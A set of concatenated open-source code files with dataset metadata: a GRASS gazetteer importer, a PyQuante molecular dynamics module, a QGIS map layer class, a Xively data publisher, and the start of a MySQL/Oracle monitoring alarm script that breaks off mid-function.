AsherBond/MondocosmOS | grass_trunk/scripts/v.in.gns/v.in.gns.py | 2 | 4283 | #!/usr/bin/env python
############################################################################
#
# MODULE: v.in.gns
#
# AUTHOR(S): Markus Neteler, neteler itc it
# Converted to Python by Glynn Clements
#
# PURPOSE: Import GEOnet Names Server (GNS) country files into a GRASS vector map
# http://earth-info.nga.mil/gns/html/
# -> Download Names Files for Countries and Territories (FTP)
#
# Column names: http://earth-info.nga.mil/gns/html/help.htm
#
# COPYRIGHT: (c) 2005 GRASS Development Team
#
# This program is free software under the GNU General Public
# License (>=v2). Read the file COPYING that comes with GRASS
# for details.
#
# TODO: - see below in the code
# - add extra columns explaining some column acronyms,
# e.g. FC (Feature Classification)
#############################################################################
#%module
#% description: Imports US-NGA GEOnet Names Server (GNS) country files into a GRASS vector points map.
#% keywords: vector
#% keywords: import
#% keywords: gazetteer
#%end
#%option G_OPT_F_INPUT
#% description: Name of input uncompressed GNS file from NGA (with .txt extension)
#%end
#%option G_OPT_V_OUTPUT
#% required: no
#%end
import sys
import os
from grass.script import core as grass
from grass.script import vector as vgrass
def main():
fileorig = options['input']
filevect = options['output']
if not filevect:
filevect = grass.basename(fileorig, 'txt')
#are we in LatLong location?
s = grass.read_command("g.proj", flags='j')
kv = grass.parse_key_val(s)
if kv['+proj'] != 'longlat':
grass.fatal(_("This module only operates in LatLong/WGS84 locations"))
#### setup temporary file
tmpfile = grass.tempfile()
coldescs = [("RC", "rc integer"),
("UFI", "uf1 integer"),
("UNI", "uni integer"),
("LAT", "lat double precision"),
("LONG", "lon double precision"),
("DMS_LAT", "dms_lat varchar(6)"),
("DMS_LONG", "dms_long varchar(7)"),
("UTM", "utm varchar(4)"),
("JOG", "jog varchar(7)"),
("FC", "fc varchar(1)"),
("DSG", "dsg varchar(5)"),
("PC", "pc integer"),
("CC1", "cci varchar(2)"),
("ADM1", "adm1 varchar(2)"),
("ADM2", "adm2 varchar(200)"),
("DIM", "dim integer"),
("CC2", "cc2 varchar(2)"),
("NT", "nt varchar(1)"),
("LC", "lc varchar(3)"),
("SHORT_FORM", "shortform varchar(128)"),
("GENERIC", "generic varchar(128)"),
("SORT_NAME", "sortname varchar(200)"),
("FULL_NAME", "fullname varchar(200)"),
("FULL_NAME_ND","funamesd varchar(200)"),
("MODIFY_DATE", "mod_date date")]
colnames = [desc[0] for desc in coldescs]
coltypes = dict([(desc[0], 'integer' in desc[1]) for desc in coldescs])
header = None
num_places = 0
inf = file(fileorig)
outf = file(tmpfile, 'wb')
for line in inf:
fields = line.rstrip('\r\n').split('\t')
if not header:
header = fields
continue
vars = dict(zip(header, fields))
fields2 = []
for col in colnames:
if col in vars:
if coltypes[col] and vars[col] == '':
fields2.append('0')
else:
fields2.append(vars[col])
else:
if coltypes[col]:
fields2.append('0')
else:
fields2.append('')
line2 = ';'.join(fields2) + '\n'
outf.write(line2)
num_places += 1
outf.close()
inf.close()
grass.message(_("Converted %d place names.") % num_places)
#TODO: fix dms_lat,dms_long DDMMSS -> DD:MM:SS
# Solution:
# IN=DDMMSS
# DEG=`echo $IN | cut -b1,2`
# MIN=`echo $IN | cut -b3,4`
# SEC=`echo $IN | cut -b5,6`
# DEG_STR="$DEG:$MIN:$SEC"
#modifications (to match DBF 10 char column name limit):
# short_form -> shortform
# sort_name -> sortname
# full_name -> fullname
# full_name_sd -> funamesd
# pump data into GRASS:
columns = [desc[1] for desc in coldescs]
grass.run_command('v.in.ascii', cat = 0, x = 5, y = 4, fs = ';',
input = tmpfile, output = filevect,
columns = columns)
grass.try_remove(tmpfile)
# write cmd history:
vgrass.vector_history(filevect)
if __name__ == "__main__":
options, flags = grass.parser()
main()
| agpl-3.0 | -2,912,952,003,685,398,500 | 27.553333 | 102 | 0.571562 | false | 3.063662 | false | false | false |
gabrielelanaro/pyquante | PyQuante/Dynamics.py | 2 | 4332 | """\
Dynamics.py: Module for molecular dynamics
This program is part of the PyQuante quantum chemistry program suite.
Copyright (c) 2004, Richard P. Muller. All Rights Reserved.
PyQuante version 1.2 and later is covered by the modified BSD
license. Please see the file LICENSE that is part of this
distribution.
"""
from NumWrap import array,zeros
from Constants import Rgas
from math import sqrt,pow
from IO import append_xyz
# Derivation of units for Force constant: (Thanks to Alejandro Strachan)
# We have accel in (kcal/mol)/(A*g/mol) and we want it in A/ps^2
# (kcal/mol)/(A*g/mol) = kcal/(A*g) = 1000 kcal/(A*kg)
# = 1000 kcal/(A*kg) * 4.184 J/cal = 4184 kJ/(A*kg)
# = 4.184e6 (kg m^2/s^2)/(A*kg) = 4.184e6 m^2/s^2/A
# = 4.184e26 A/s^2 = 418.4 A/(ps^2)
fconst = 418.4 # convert (kcal/mol)/(A*g/mol) to A/ps^2
# The inverse of this quantity transforms back from amu*(A^2/ps^2) to kcal/mol
def Dynamics(atoms,EnergyForces,nsteps=1000,Ti=298,dt=1e-3):
xyz = open('pyqmd.xyz','w')
dat = open('pyqmd.dat','w')
set_boltzmann_velocities(atoms,Ti)
Etot = 0
for step in xrange(nsteps):
append_xyz(xyz,atoms.atuples(),"PQMD %4d E = %10.4f" % (step,Etot))
try:
Ev,F = EnergyForces(atoms)
except:
print "Using averaging to try and converge"
Ev,F = EnergyForces(atoms,0.5)
set_forces(atoms,F)
LeapFrogUpdate(atoms,dt)
#for atom in atoms: flask.bounce(atom)
Ek = get_kinetic(atoms)
T = get_temperature(atoms)
#rescale_velocities(atoms,Ti) # uncomment for iso-kinetics
Etot = Ev+Ek
print step*dt,Etot,Ev,Ek,T
dat.write("%10.4f %10.4f %10.4f %10.4f %10.4f\n" %
(step*dt,Etot,Ev,Ek,T))
dat.flush()
return
def get_kinetic(atoms):
sum_mv2 = 0
for atom in atoms: sum_mv2 += atom.mass()*atom.v0.squared()
return 0.5*sum_mv2/fconst
# There's a disconnect here, in that the kinetic energy is being
# computed with v0 (v(t)) and the temperature is being computed
# at v (v(t+dt/2))
def get_temperature(atoms):
sum_mv2 = 0
for atom in atoms: sum_mv2 += atom.mass()*atom.v.squared()
return 1000*sum_mv2/((3*len(atoms)-6)*Rgas*fconst)
def LeapFrogUpdate(atoms,dt):
# Leap-frog Verlet dynamics is based on the equations
# v(t+dt/2) = v(t-dt/2)+dt*a(t)
# r(t+dt) = r(t) + dt*v(t+dt/2)
# so that the positions, calculated at dt,2dt,3dt, etc.,
# leap-frog over the velocities, calculated at dt/2,3dt/2,5dt/2...
for atom in atoms:
m = atom.mass()
a = -atom.F*fconst/m # a = F/m
vnew = atom.v + dt*a # v(t+dt/2) = v(t-dt/2) + dt*a
# Save the current velocity for later calc of T,Ek
atom.v0 = 0.5*(vnew+atom.v) # v(t) = 0.5*(v(t-dt/2)+v(t+dt/2)
atom.r += dt*vnew # r(t+dt) = r(t) + dt*v(t+dt/2)
atom.v = vnew
return
def set_forces(atoms,F):
for i in xrange(len(atoms)):
fx,fy,fz = F[i]
atoms[i].F = array((fx,fy,fz))
return
def set_boltzmann_velocities(atoms,T):
from random import gauss,randint
Eavg = Rgas*T/2000 # kT/2 per degree of freedom (kJ/mol)
vels = []
for atom in atoms:
m = atom.mass()
vavg = sqrt(2*Eavg*fconst/m)
stdev = 0.01 #I'm setting the std dev wrong here
atom.v = array((pow(-1,randint(0,1))*gauss(vavg,stdev),
pow(-1,randint(0,1))*gauss(vavg,stdev),
pow(-1,randint(0,1))*gauss(vavg,stdev)))
subtract_com_velocity(atoms)
rescale_velocities(atoms,T)
return
def subtract_com_velocity(atoms):
vcom = get_vcom(atoms)
for atom in atoms: atom.v -= vcom
return
def rescale_velocities(atoms,T):
Tact = get_temperature(atoms)
scalef = sqrt(T/Tact)
for atom in atoms: atom.v *= scalef
return
def get_vcom(atoms):
"Compute the Center of Mass Velocity"
vcom = zeros(3,'d')
totm = 0
for atom in atoms:
m = atom.mass()
vcom += m*atom.v
totm += m
return vcom/totm
if __name__ == '__main__':
from MINDO3 import get_energy_forces
from Molecule import Molecule
rdx = Molecule('RDX',filename='/home/rmuller/gallery/rdx.xyz')
Dynamics(rdx,get_energy_forces,nsteps=3,Ti=4000)
| bsd-3-clause | 6,966,622,816,214,444,000 | 32.581395 | 78 | 0.602955 | false | 2.717691 | false | false | false |
TIGER-NET/WOIS_plugins | openlayers_plugin/weblayers/apple_maps.py | 5 | 1320 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
OpenLayers Plugin
A QGIS plugin
-------------------
begin : 2009-11-30
copyright : (C) 2009 by Pirmin Kalberer, Sourcepole
email : pka at sourcepole.ch
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from weblayer import WebLayer3857
class OlAppleiPhotoMapLayer(WebLayer3857):
emitsLoadEnd = True
def __init__(self):
WebLayer3857.__init__(self, groupName="Apple Maps", groupIcon="apple_icon.png",
name='Apple iPhoto map', html='apple.html')
| gpl-3.0 | 1,019,599,708,684,583,700 | 40.25 | 87 | 0.370455 | false | 5.617021 | false | false | false |
twatteyne/dustlink_academy | DataConnector/XivelySyncEngine.py | 2 | 9707 | #!/usr/bin/python
import logging
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('XivelySyncEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import time
import copy
import threading
from pydispatch import dispatcher
from EventBus import EventBusClient
from DustLinkData import DustLinkData
from SmartMeshSDK import FormatUtils
from SmartMeshSDK.protocols.xivelyConnector import xivelyConnector
class XivelySyncEngine(EventBusClient.EventBusClient):
CHECKDELAY = 5 # in s, delay between verifying that there is so API key
def __init__(self):
# log
log.info('creating instance')
# store params
# local variables
self.connector = None
self.lastCheck = None
self.xivelyApiKey = None
self.subscribedMotes = []
self.statusLock = threading.Lock()
self.status = {}
self.status['apiKeySet'] = 'WAIT...'
self.status['status'] = 'DISCONNECTED'
self.status['numConnectionsOK'] = 0
self.status['numConnectionsFailed'] = 0
self.status['numSubscriptionsFailed'] = 0
self.status['lastConnected'] = None
self.status['lastDisconnected'] = None
self.status['numPublishedOK'] = 0
self.status['numPublishedFail'] = 0
# initialize parent class
EventBusClient.EventBusClient.__init__(self,
signal = 'newDataMirrored',
cb = self._publish,
teardown_cb = self._cleanup,
)
self.name = 'DataConnector_xivelyConnector'
# connect extra events
dispatcher.connect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
# add stats
#======================== public ==========================================
def getStatus(self):
with self.statusLock:
return copy.deepcopy(self.status)
#======================== private =========================================
def _cleanup(self):
# disconnect extra events
dispatcher.disconnect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
def _publish(self,sender,signal,data):
now = time.time()
dld = DustLinkData.DustLinkData()
mac = data['mac']
#========== connect/disconnect
if (self.lastCheck==None) or (now-self.lastCheck>self.CHECKDELAY):
# remember I just checked
self.lastCheck = now
# we need to use "raw" access because dld.getPublisherSettings()
# does not return all settings
settings = dld.get(['system','publishers','xively'])
# record the xivelyApiKey
xivelyApiKey = None
if ('xivelyApiKey' in settings) and settings['xivelyApiKey']:
xivelyApiKey = settings['xivelyApiKey']
# update status
if xivelyApiKey==None:
with self.statusLock:
self.status['apiKeySet'] = 'NO'
else:
with self.statusLock:
self.status['apiKeySet'] = 'YES'
# decide whether to connect/disconnect
if (not self.connector) and xivelyApiKey:
# connect
# log
log.info("Connecting to Xively")
# remember API key
self.xivelyApiKey = xivelyApiKey
# connect
try:
self.connector = xivelyConnector.xivelyConnector(
apiKey = self.xivelyApiKey,
productName = 'SmartMesh IP Starter Kit',
productDesc = 'Connecting using DustLink',
)
except Exception as err:
# log
log.error("Error while connecting to Xively: {0}".format(err))
# update status
with self.statusLock:
self.status['status'] = 'CONNECTION FAILED'
self.status['numConnectionsFailed']+= 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['status'] = 'CONNECTED'
self.status['numConnectionsOK'] += 1
self.status['lastConnected'] = dld.timestampToStringShort(now)
elif ((self.connector) and (not xivelyApiKey)) or (self.xivelyApiKey!=xivelyApiKey):
# disconnect
self._disconnect()
#========== publish data
if self.connector:
try:
self.connector.publish(
mac = data['mac'],
datastream = data['type'],
value = data['lastvalue'],
)
except Exception as err:
# log
log.error(
"Error while publishing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
data['type'],
err,
)
)
# update status
with self.statusLock:
self.status['numPublishedFail'] += 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['numPublishedOK'] += 1
#========== subscribe
if self.connector:
if mac not in self.subscribedMotes:
try:
if ('subscribeToLed' in data) and (data['subscribeToLed']):
# create datastream
self.connector.publish(
mac = mac,
datastream = 'led',
value = 0,
)
# subscribe
self.connector.subscribe(
mac = mac,
datastream = 'led',
callback = self._led_cb,
)
except Exception as err:
# log
log.error(
"Error while subscribing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
'led',
err,
)
)
# update status
with self.statusLock:
self.status['status'] = 'SUBSCRIPTION FAILED'
self.status['numSubscriptionsFailed'] += 1
# disconnect
self._disconnect()
else:
self.subscribedMotes += [mac]
def _disconnect(self):
now = time.time()
dld = DustLinkData.DustLinkData()
# log
log.info("Disconnecting from Xively")
# close connector
try:
self.connector.close()
except Exception:
pass # happens when no active subscription
# reset variables
self.connector = None
self.xivelyApiKey = None
self.subscribedMotes = []
# update status
with self.statusLock:
self.status['status'] = 'DISCONNECTED'
self.status['lastDisconnected'] = dld.timestampToStringShort(now)
def _led_cb(self,mac,datastream,value):
# all non-0 values turn LED on
if value==0:
value = 0
else:
value = 1
dispatcher.send(
signal = 'fieldsToMesh_OAPLED',
data = {
'mac': mac,
'fields': {
'status': value,
},
}
)
| bsd-3-clause | -8,450,043,477,461,482,000 | 33.917266 | 96 | 0.394664 | false | 5.767677 | false | false | false |
JK-Warriors/Heimdallr | python/alarm.py | 1 | 81692 | #!/bin/env python
#-*-coding:utf-8-*-
import os
import sys
import string
import time
import datetime
import MySQLdb
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("wlblazers")
path='./include'
sys.path.insert(0,path)
import functions as func
import sendmail
import sendsms_fx
import sendsms_api
send_mail_max_count = func.get_option('send_mail_max_count')
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
mail_to_list_common = func.get_option('send_mail_to_list')
send_sms_max_count = func.get_option('send_sms_max_count')
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
send_sms_sleep_time = func.get_option('send_sms_sleep_time')
sms_to_list_common = func.get_option('send_sms_to_list')
def get_alarm_mysql_status():
sql="select a.server_id,a.connect,a.threads_connected,a.threads_running,a.threads_waits,a.create_time,a.host,a.port,b.alarm_threads_connected,b.alarm_threads_running,alarm_threads_waits,b.threshold_warning_threads_connected,b.threshold_critical_threads_connected,b.threshold_warning_threads_running,b.threshold_critical_threads_running,threshold_warning_threads_waits,threshold_critical_threads_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_status a, db_cfg_mysql b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
threads_connected=line[2]
threads_running=line[3]
threads_waits=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_threads_connected=line[8]
alarm_threads_running=line[9]
alarm_threads_waits=line[10]
threshold_warning_threads_connected=line[11]
threshold_critical_threads_connected=line[12]
threshold_warning_threads_running=line[13]
threshold_critical_threads_running=line[14]
threshold_warning_threads_waits=line[15]
threshold_critical_threads_waits=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mysql server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mysql server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_threads_connected)==1:
if int(threads_connected)>=int(threshold_critical_threads_connected):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'critical','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'threads_connected',threads_connected,'critical')
elif int(threads_connected)>=int(threshold_warning_threads_connected):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'warning','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'threads_connected',threads_connected,'warning')
else:
func.update_db_status('sessions',1,host,port,create_time,'threads_connected',threads_connected,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'threads connected ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_threads_running)==1:
if int(threads_running)>=int(threshold_critical_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'critical','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'threads_running',threads_running,'critical')
elif int(threads_running)>=int(threshold_warning_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'warning','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'threads_running',threads_running,'warning')
else:
func.update_db_status('actives',1,host,port,create_time,'threads_running',threads_running,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'threads running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_threads_waits)==1:
if int(threads_waits)>=int(threshold_critical_threads_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'critical','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'threads_waits',threads_waits,'critical')
elif int(threads_waits)>=int(threshold_warning_threads_running):
send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'warning','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'threads_waits',threads_waits,'warning')
else:
func.update_db_status('waits',1,host,port,create_time,'threads_waits',threads_waits,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'threads waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
else:
pass
def get_alarm_mysql_replcation():
sql = "select a.server_id,a.slave_io_run,a.slave_sql_run,a.delay,a.create_time,b.host,b.port,b.alarm_repl_status,b.alarm_repl_delay,b.threshold_warning_repl_delay,b.threshold_critical_repl_delay,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_dr_s a, db_cfg_mysql b where a.server_id=b.id and a.is_slave='1';"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
slave_io_run=line[1]
slave_sql_run=line[2]
delay=line[3]
create_time=line[4]
host=line[5]
port=line[6]
alarm_repl_status=line[7]
alarm_repl_delay=line[8]
threshold_warning_repl_delay=line[9]
threshold_critical_repl_delay=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_repl_status)==1:
if (slave_io_run== "Yes") and (slave_sql_run== "Yes"):
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',1,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'ok')
if int(alarm_repl_delay)==1:
if int(delay)>=int(threshold_critical_repl_delay):
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'critical','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',3,host,port,create_time,'repl_delay',delay,'critical')
elif int(delay)>=int(threshold_warning_repl_delay):
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'warning','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',2,host,port,create_time,'repl_delay',delay,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',delay,'ok')
else:
send_mail = func.update_send_mail_status(server_id,db_type,'replication',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'replication',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical','replication stop',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',3,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
pass
def get_alarm_oracle_status():
sql = """SELECT a.server_id,
a.connect,
a.session_total,
a.session_actives,
a.session_waits,
CONVERT(a.flashback_space_used, DECIMAL(10,2)) as flashback_space_used,
a.database_role,
a.dg_stats,
a.dg_delay,
a.create_time,
b.HOST,
b.PORT,
b.alarm_session_total,
b.alarm_session_actives,
b.alarm_session_waits,
b.alarm_fb_space,
b.threshold_warning_session_total,
b.threshold_critical_session_total,
b.threshold_warning_session_actives,
b.threshold_critical_session_actives,
b.threshold_warning_session_waits,
b.threshold_critical_session_waits,
b.threshold_warning_fb_space,
b.threshold_critical_fb_space,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_status a, db_cfg_oracle b
WHERE a.server_id = b.id """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
session_total=line[2]
session_actives=line[3]
session_waits=line[4]
flashback_space_used=line[5]
database_role=line[6]
mrp_status=line[7]
dg_delay=line[8]
create_time=line[9]
host=line[10]
port=line[11]
alarm_session_total=line[12]
alarm_session_actives=line[13]
alarm_session_waits=line[14]
alarm_fb_space=line[15]
threshold_warning_session_total=line[16]
threshold_critical_session_total=line[17]
threshold_warning_session_actives=line[18]
threshold_critical_session_actives=line[19]
threshold_warning_session_waits=line[20]
threshold_critical_session_waits=line[21]
threshold_warning_fb_space=line[22]
threshold_critical_fb_space=line[23]
send_mail=line[24]
send_mail_to_list=line[25]
send_sms=line[26]
send_sms_to_list=line[27]
tags=line[28]
db_type=line[29]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','oracle server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','oracle server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_session_total)==1:
if int(session_total) >= int(threshold_critical_session_total):
send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'critical','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'session_total',session_total,'critical')
elif int(session_total) >= int(threshold_warning_session_total):
send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'warning','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'session_total',session_total,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'session_total',session_total,'ok')
if int(alarm_session_actives)==1:
if int(session_actives) >= int(threshold_critical_session_actives):
send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'critical','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'session_actives',session_actives,'critical')
elif int(session_actives) >= int(threshold_warning_session_actives):
send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'warning','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'session_actives',session_actives,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'active sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'session_actives',session_actives,'ok')
if int(alarm_session_waits)==1:
if int(session_waits) >= int(threshold_critical_session_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'critical','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'session_waits',session_waits,'critical')
elif int(session_waits) >= int(threshold_warning_session_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'warning','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'session_waits',session_waits,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'waits sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'session_waits',session_waits,'ok')
if int(alarm_fb_space)==1:
if int(flashback_space_used) >= int(threshold_critical_fb_space):
